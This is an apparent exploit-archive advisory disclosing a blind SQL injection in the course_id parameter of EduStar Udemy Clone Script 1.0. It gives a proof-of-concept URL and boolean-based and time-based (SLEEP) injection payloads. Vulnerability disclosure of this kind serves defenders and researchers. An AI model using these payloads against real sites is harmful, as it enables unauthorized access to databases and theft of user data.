EduStar Udemy Clone Script 1.0 SQL Injection

EduStar Udemy Clone Script version 1.0 suffers from a remote SQL injection vulnerability.


MD5 | 1bb6e39bc09dc8a47ec2ed8a31967323

# Exploit Title: EduStar Udemy Clone Script v1.0 - SQL Injection
# Date: 2017-09-11
# Exploit Author: 8bitsec
# Vendor Homepage: https://www.abservetech.com/
# Software Link: https://www.abservetech.com/edustar-udemy-clone/
# Version: 1.0
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec

Release Date:
=============
2017-09-11

Product & Service Introduction:
===============================
EduStar Udemy Clone Script

Technical Details & Description:
================================

Blind SQL injection on [course_id] parameter.

Proof of Concept (PoC):
=======================

http://localhost/[path]/courses/details?course_id=105 and 1=1

Parameter: course_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: course_id=105 AND 4868=4868

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: course_id=105 AND SLEEP(5)

==================
8bitsec - [https://twitter.com/_8bitsec]


Related Posts

Comments